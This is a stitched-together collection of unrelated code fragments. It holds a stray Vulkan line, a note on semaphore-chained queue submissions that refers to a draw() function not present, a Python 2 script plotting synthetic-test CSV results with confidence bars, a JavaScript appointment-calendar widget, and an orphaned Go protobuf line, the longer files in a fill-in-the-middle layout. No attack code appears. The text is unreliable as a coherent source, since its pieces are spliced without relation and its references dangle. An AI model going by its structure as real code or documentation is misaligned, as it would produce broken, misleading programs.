ubos.vertBlur.horizontal = 0; VK_CHECK_RESULT(vkMapMemory(device, uniformData.fsVertBlur.memory, 0, sizeof(ubos.vertBlur), 0, (void **)&pData));
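The draw() function above chains two queue submissions through a dedicated semaphore so that the offscreen (vertical blur) pass is guaranteed to finish before the scene pass samples its color attachment. A minimal sketch of that wait/signal pattern follows; all names here (offscreenCmd, sceneCmd, offscreenSemaphore, and the two base-class semaphores) are illustrative placeholders, not the example's actual members:

// Hedged sketch: two dependent submissions chained by a semaphore.
// Only the wait/signal pattern matters; the handle names are assumptions.
VkSubmitInfo submit = {};
submit.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO;
VkPipelineStageFlags waitStage = VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT;
submit.waitSemaphoreCount = 1;
submit.pWaitDstStageMask = &waitStage;
submit.commandBufferCount = 1;
submit.signalSemaphoreCount = 1;

// Pass 1: wait on presentation, signal the offscreen semaphore
submit.pWaitSemaphores = &presentCompleteSemaphore;
submit.pSignalSemaphores = &offscreenSemaphore;
submit.pCommandBuffers = &offscreenCmd;
vkQueueSubmit(queue, 1, &submit, VK_NULL_HANDLE);

// Pass 2: wait on the offscreen semaphore, signal render-complete
submit.pWaitSemaphores = &offscreenSemaphore;
submit.pSignalSemaphores = &renderCompleteSemaphore;
submit.pCommandBuffers = &sceneCmd;
vkQueueSubmit(queue, 1, &submit, VK_NULL_HANDLE);

Without the intermediate semaphore, a driver is free to start both command buffers concurrently, so the scene pass could sample a half-written blur attachment.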
<|file_name|>plotynth.py<|end_file_name|><|fim▁begin|>#!/bin/env python

# plot results from ynthetictest.py
# by Dan Stowell, spring 2013

import os.path
import csv
from math import log, exp, pi, sqrt, ceil, floor
from numpy import mean, std, shape
import numpy as np
import random

import matplotlib.pyplot as plt
import matplotlib.cm as cm
from mpl_toolkits.mplot3d import Axes3D
import itertools

#annotdir = os.path.expanduser("~/svn/stored_docs/python/markovrenewal/output")
annotdir = "output"

plotfontsize = "large" #"xx-small"

namelookup = {
    'fsn':'Fsn', 'ftrans':'Ftrans', 'fsigtrans':'Fsigtrans', 'msecs':'Run time (msecs)',
    'birthdens_mism':'Error in assumed birth density (ratio)', 'deathprob_mism':'Error in assumed death probability (ratio)',
    'snr_mism':'Error in assumed SNR (dB)', 'gen_mism':'Proportion of errors in transition probabilities',
    'misseddetectionprob':'Missed detection probability', 'noisecorr':'Amount of signal correlation imposed on noise',
    'snr':'SNR (dB)', 'birthdens':'birth intensity',
    #'':'',
    }

def readable_name(name):
    return namelookup.get(name, name)

def fmt_chooser(currentcombi, groupcols, groupingvals):
    fmt = 'k'
    if groupcols[0]=='mmrpmode' and currentcombi[0]=='greedy':
        if (len(groupcols)>1) and groupingvals[groupcols[1]].index(currentcombi[1])>0:
            fmt += ':'
        else:
            fmt += '-.'
    else:
        if (len(groupcols)>1) and groupingvals[groupcols[1]].index(currentcombi[1])>0:
            fmt += '--'
        else:
            fmt += '-'
    return fmt

def ynth_csv_to_ciplot(csvpath, outpath, groupcols, summarycols, filtercols=None, xjitter=0.):
    """
    groupcols: used for discrete grouping of data, with the first one becoming the x-axis in a plot, remaining ones as multiple lines;
    summarycols: the name(s) of the columns to be made into y-values. one separate plot will be made for each.
    filtercols: {key->listofallowed...} select rows only where particular STRING values are found. otherwise, summaries are pooled over all values.
    """
    data = ynth_csv_loaddata(csvpath, groupcols, summarycols, filtercols)
    # data is {'groupingvals':{ col: list }, 'summarydata':{ tupleofgroupvals: { summarycol:{'mean': _, 'stderr': _} } } }
    csvname = os.path.splitext(os.path.basename(csvpath))[0]
    if isinstance(summarycols, basestring): summarycols = [summarycols]
    if isinstance(groupcols, basestring): groupcols = [groupcols]
    # one plot for each summarycol
    for summarycol in summarycols:
        fig = plt.figure()
        # Now, we're going to use the first grouper as the x-axis.
        # This means we want to iterate over all combinations of the other groupers, drawing a line each time.
        for linegroupcombi in itertools.product(*[data['groupingvals'][col] for col in groupcols[1:]]):
            linedata = []
            for xval in data['groupingvals'][groupcols[0]]:
                fullgroupcombi = (xval,) + tuple(linegroupcombi)
                ourdata = data['summarydata'][fullgroupcombi][summarycol]
                if xjitter != 0:
                    xval += random.gauss(0, xjitter)
                linedata.append({'xval':xval, 'mean': ourdata['mean'], 'stderr_up': ourdata['stderr'], 'stderr_dn': ourdata['stderr']})
            # draw a line
            linelabel = ', '.join([linegroupcombi[0]] + ["%s %s" % (readable_name(groupcols[lgi+2]), lg) for lgi, lg in enumerate(linegroupcombi[1:])])
            plt.errorbar([x['xval'] for x in linedata], \
                [x['mean'] for x in linedata], \
                ([x['stderr_dn'] for x in linedata], [x['stderr_up'] for x in linedata]), \
                label=linelabel, fmt=fmt_chooser(linegroupcombi, groupcols[1:], data['groupingvals']))

        #plt.title("%s_%s" % (whichstat, runtype), fontsize=plotfontsize)
        plt.xlabel(readable_name(groupcols[0]), fontsize=plotfontsize)
        plt.ylabel(readable_name(summarycol), fontsize=plotfontsize)
        plt.xticks(data['groupingvals'][groupcols[0]], fontsize=plotfontsize)
        xdatamax = max(data['groupingvals'][groupcols[0]])
        xdatamin = min(data['groupingvals'][groupcols[0]])
        plt.xlim(xmin=xdatamin-(xdatamax-xdatamin)*0.05, xmax=xdatamax+(xdatamax-xdatamin)*0.05)
        #yuck
        if groupcols[0] in ['deathprob_mism', 'birthdens_mism']: #yuck
            plt.xscale('log')
        if summarycol in ['msecs']:
            plt.yscale('log')
        else:
            plt.ylim(ymin=0.2, ymax=1) #rescale(0.3), ymax=rescale(1.001))
            #plt.yticks(map(rescale, yticks), yticks, fontsize=plotfontsize)
        plt.yticks(fontsize=plotfontsize)
        plt.legend(loc=(0.02, 0.05), prop={'size':'medium'})
        outfilepath = "%s/%s_%s.pdf" % (outpath, csvname, summarycol)
        plt.savefig(outfilepath, papertype='A4', format='pdf')
        print("Written file %s" % outfilepath)

# LATER: consider how to avoid filename collisions - just allow user to specify a lbl?
def ynth_csv_to_surfaceplot(csvpath, outpath, groupcols, summarycols, filtercols=None):
    """
    groupcols: used for discrete grouping of data, with the first one becoming the x-axis in a plot, second as y-axis;
    summarycols: the name(s) of the columns to be made into y-values. one separate plot will be made for each.
    filtercols: {key->listofallowed...} select rows only where particular STRING values are found. otherwise, summaries are pooled over all values.
    """
    data = ynth_csv_loaddata(csvpath, groupcols, summarycols, filtercols)
    # data is {'groupingvals':{ col: list }, 'summarydata':{ tupleofgroupvals: { summarycol:{'mean': _, 'stderr': _} } } }
    csvname = os.path.splitext(os.path.basename(csvpath))[0]
    if isinstance(summarycols, basestring): summarycols = [summarycols]
    if isinstance(groupcols, basestring): groupcols = [groupcols]
    if len(groupcols) != 2:
        raise ValueError("for surface plot, exactly 2 groupcols must be specified (used as X and Y).")
    # one plot for each summarycol
    for summarycol in summarycols:
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='3d') # 3D here
        # NOW DO A SURFACE PLOT
        data['groupingvals'][groupcols[0]].sort()
        ydata = map(float, data['groupingvals'][groupcols[1]])
        ydata.sort()
        data['groupingvals'][groupcols[1]].sort(cmp=lambda a,b: cmp(float(a), float(b)))
        z = [[data['summarydata'][(x,y)][summarycol]['mean'] for x in data['groupingvals'][groupcols[0]]] for y in data['groupingvals'][groupcols[1]]]
        ymesh = np.array([data['groupingvals'][groupcols[0]] for _ in range(len(data['groupingvals'][groupcols[1]]))])
        xmesh = np.array([ydata for _ in range(len(data['groupingvals'][groupcols[0]]))]).T
        z = np.array(z)
        ax.plot_surface(xmesh, ymesh, z, rstride=1, cstride=1)
        """
        plt.imshow(z, interpolation='nearest', cmap=cm.binary)
        """
        """
        # Now, we're going to use the first grouper as the x-axis.
        # This means we want to iterate over all combinations of the other groupers, drawing a line each time.
        for linegroupcombi in itertools.product(*[data['groupingvals'][col] for col in groupcols[1:]]):
            linedata = []
            for xval in data['groupingvals'][groupcols[0]]:
                fullgroupcombi = (xval,) + tuple(linegroupcombi)
                ourdata = data['summarydata'][fullgroupcombi][summarycol]
                if xjitter != 0:
                    xval += random.gauss(0,xjitter)
                linedata.append({'xval':xval, 'mean': ourdata['mean'], 'stderr_up': ourdata['stderr'], 'stderr_dn': ourdata['stderr']})
            # draw a line
            linelabel = ', '.join([linegroupcombi[0]] + ["%s %s" % (readable_name(groupcols[lgi+2]), lg) for lgi, lg in enumerate(linegroupcombi[1:])])
            plt.errorbar([x['xval'] for x in linedata], \
                [x['mean'] for x in linedata], \
                ([x['stderr_dn'] for x in linedata], [x['stderr_up'] for x in linedata]), \
                label=linelabel, fmt=fmt_chooser(linegroupcombi, groupcols[1:], data['groupingvals']))
        """
        #plt.title("%s_%s" % (whichstat, runtype), fontsize=plotfontsize)
        """
        plt.xlabel(readable_name(groupcols[0]), fontsize=plotfontsize)
        plt.ylabel(readable_name(groupcols[1]), fontsize=plotfontsize)
        plt.title(readable_name(summarycol), fontsize=plotfontsize)
        plt.xticks(range(len(data['groupingvals'][groupcols[0]])), data['groupingvals'][groupcols[0]], fontsize=plotfontsize)
        plt.yticks(range(len(data['groupingvals'][groupcols[1]])), data['groupingvals'][groupcols[1]], fontsize=plotfontsize)
        """
        """
        xdatamax = max(data['groupingvals'][groupcols[0]])
        xdatamin = min(data['groupingvals'][groupcols[0]])
        plt.xlim(xmin=xdatamin-(xdatamax-xdatamin)*0.05, xmax=xdatamax+(xdatamax-xdatamin)*0.05)
        ydatamax = max(data['groupingvals'][groupcols[0]])
        ydatamin = min(data['groupingvals'][groupcols[0]])
        plt.ylim(ymin=ydatamin-(ydatamax-ydatamin)*0.05, ymax=ydatamax+(ydatamax-ydatamin)*0.05)
        if summarycol in ['msecs']:
            plt.zscale('log')
        else:
            plt.zlim(ymin=0.2, ymax=1) #rescale(0.3), ymax=rescale(1.001))
        plt.zticks(fontsize=plotfontsize)
        #plt.legend(loc=(0.02, 0.05), prop={'size':'medium'})
        """
        #can't for 3d: plt.colorbar()
        outfilepath = "%s/%s_%s_surf.pdf" % (outpath, csvname, summarycol)
        plt.savefig(outfilepath, papertype='A4', format='pdf')
        print("Written file %s" % outfilepath)

def ynth_csv_loaddata(csvpath, groupcols, summarycols, filtercols=None):
    # load the csv data, applying filtering as we load, and floatifying the summarycols and groupcols
    # also build up some lists of the values found in the groupcols
    if isinstance(groupcols, basestring): groupcols = [groupcols]
    if isinstance(summarycols, basestring): summarycols = [summarycols]
    rdr = csv.DictReader(open(csvpath, 'rb'))
    groupingvals = {col:set() for col in groupcols}
    rawgroupeddata = {} # a dict where a TUPLE of groupedvals maps to a dict containing mean and ci
    for row in rdr:
        # filtering
        skiprow = False
        if filtercols:
            for (filtercol, allowedvals) in filtercols.items():<|fim▁hole|>
        # floatify
        # CANNOT (eg for mmrpmode): for col in groupcols: row[col] = float(row[col])
        row[groupcols[0]] = float(row[groupcols[0]])
        for col in summarycols: row[col] = float(row[col])
        # record the grouping values
        for col in groupcols:
            groupingvals[col].add(row[col])
        # and of course store the datum
        groupindex = tuple(row[col] for col in groupcols)
        if groupindex not in rawgroupeddata: rawgroupeddata[groupindex] = []
        rawgroupeddata[groupindex].append(row)
    # then construct the summary results: a dict where a TUPLE of groupedvals maps to a dict containing mean and ci
    summarydata = {}
    for groupindex, datalist in rawgroupeddata.items():
        ourstats = {}
        for whichsummarycol in summarycols:
            numlist = [datum[whichsummarycol] for datum in datalist]
            themean = mean(numlist)
            stderr = std(numlist) / sqrt(len(numlist))
            ourstats[whichsummarycol] = {'mean':themean, 'stderr':stderr}
        summarydata[groupindex] = ourstats
    # return the groupcol listing and the big dict of summary data
    for col in groupcols:
        groupingvals[col] = list(groupingvals[col])
        groupingvals[col].sort()
    return {'groupingvals':groupingvals, 'summarydata':summarydata}

################################################################################################################
if __name__ == '__main__':

    # NOTE: filtercols must list string values not floats
    ynth_csv_to_ciplot("%s/ynth_varying1.csv" % annotdir, "%s/pdf" % annotdir, \
        groupcols=['snr', 'mmrpmode', 'birthdens'], summarycols=['fsn', 'fsigtrans', 'msecs'], filtercols=None, xjitter=0.1)
    #ynth_csv_to_ciplot("%s/ynth_varying100.csv" % annotdir, "%s/pdf" % annotdir, \
    #    groupcols=['snr', 'mmrpmode', 'birthdens'], summarycols=['fsn', 'fsigtrans', 'msecs'], filtercols=None, xjitter=1.1)
    ynth_csv_to_ciplot("%s/ynth_sens_snr.csv" % annotdir, "%s/pdf" % annotdir, \
        groupcols=['snr_mism', 'mmrpmode'
        #, 'snr'
        ], summarycols=['fsn', 'fsigtrans'], filtercols=None)
    ynth_csv_to_ciplot("%s/ynth_sens_birth.csv" % annotdir, "%s/pdf" % annotdir, \
        groupcols=['birthdens_mism', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None)
    ynth_csv_to_ciplot("%s/ynth_sens_death.csv" % annotdir, "%s/pdf" % annotdir, \
        groupcols=['deathprob_mism', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None)
    ynth_csv_to_ciplot("%s/ynth_sens_noisecorr.csv" % annotdir, "%s/pdf" % annotdir, \
        groupcols=['noisecorr', 'mmrpmode'], summarycols=['fsn', 'fsigtrans', 'msecs'], filtercols=None) # added msecs to noisecorr since long
    ynth_csv_to_ciplot("%s/ynth_sens_missed.csv" % annotdir, "%s/pdf" % annotdir, \
        groupcols=['misseddetectionprob', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None)
    ynth_csv_to_ciplot("%s/ynth_sens_tt.csv" % annotdir, "%s/pdf" % annotdir, \
        groupcols=['gen_mism', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None)
#    ynth_csv_to_surfaceplot("%s/ynth_sens_snr.csv" % annotdir, "%s/pdf" % annotdir, \
#        groupcols=['snr_mism', 'snr'], summarycols=['fsn', 'fsigtrans'], filtercols={'mmrpmode':['full']}) # full inference only<|fim▁end|>
                if row[filtercol] not in allowedvals:
                    skiprow = True
                    break
        if skiprow:
            continue
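ynth_csv_loaddata's summary step reduces each group of rows to a mean plus a standard error of the mean (std/sqrt(n)), which ynth_csv_to_ciplot then draws as symmetric error bars. A self-contained illustration of that reduction, independent of the CSV plumbing (the group keys and score values below are made up for demonstration):

from math import sqrt
from numpy import mean, std

# Hypothetical rows already grouped by (snr, mmrpmode); values are 'fsn' scores.
groups = {
    (0.0, 'full'):   [0.81, 0.79, 0.84],
    (0.0, 'greedy'): [0.66, 0.70, 0.61],
}
summary = {}
for groupindex, numlist in groups.items():
    # Same reduction as ynth_csv_loaddata: mean plus std-error of the mean.
    summary[groupindex] = {'mean': mean(numlist),
                           'stderr': std(numlist) / sqrt(len(numlist))}
print(summary)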
<|file_name|>user.js<|end_file_name|><|fim▁begin|>// set event handlers and initialize date
var utils = new MedialUtilities();
var week = 0;

window.addEventListener('load', function() {
    document.getElementById('appointment').addEventListener('click', overlayCalendar);
    document.getElementById('calendar-close').addEventListener('click', closeCalendar);
    document.getElementById('go-back') && document.getElementById('go-back').addEventListener('click', back);
    document.getElementById('go-next') && document.getElementById('go-next').addEventListener('click', next);
    document.getElementById('go-next-cal').addEventListener('click', nextcal);
    document.getElementById('go-back-cal').addEventListener('click', backcal);
});

function overlayCalendar() {
    newdiv = document.createElement('div');
    newdiv.id = 'calendarOverlay';
    newdiv.style.width = window.screen.width + 'px';
    newdiv.style.height = window.screen.height + 'px';
    newdiv.style.position = 'fixed';
    newdiv.style.display = 'block';
    newdiv.style.background = 'rgba(0,0,0,0.8)';
    newdiv.style.zIndex = 9999;
    newdiv.style.top = 0;
    document.getElementsByTagName('body')[0].appendChild(newdiv);
    document.getElementById('calendar').style.zIndex = 99999;
    document.getElementById('calendar').style.position = 'relative';
    document.getElementById('calendar').style.background = 'rgba(255,255,255,1)';
    document.getElementById('calendar-close').style.display = 'block';
}

function closeCalendar() {
    document.getElementById('calendarOverlay').remove();
    document.getElementById('calendar').style.background = '#F4F7FB';
    document.getElementById('calendar-close').style.display = 'none';
}<|fim▁hole|>

function back() {
    if (week == 0) { return false; } else { week -= 1; }
    if (week >= 0) { getCalendar(); }
}

function next() {
    if (week == eamax) { return false; } else { week += 1; }
    if (week <= eamax) { getCalendar(); }
}

function getCalendar() {
    var params = 'info[user]=' + eauser + '&info[service]=' + easervice + '&info[week]=' + week + '&' + eatoken;
    var url = earoot + 'index.php?option=com_easyappointment&task=json.getCalendar&tmpl=component';
    utils.makeAjaxCall(url, 'POST', params, function(msg) {
        var response = JSON.parse(msg);
        if (!response.error) {
            document.getElementById('calendar-table').innerHTML = response.value;
        }
    });
}

function nextcal() {
    document.getElementById('calendar-table').scrollLeft += parseInt(document.getElementById('calendar').clientWidth / 3);
}

function backcal() {
    document.getElementById('calendar-table').scrollLeft -= parseInt(document.getElementById('calendar').clientWidth / 3);
}<|fim▁end|>
if err := proto.Unmarshal(contents, &detachment); err != nil { return err }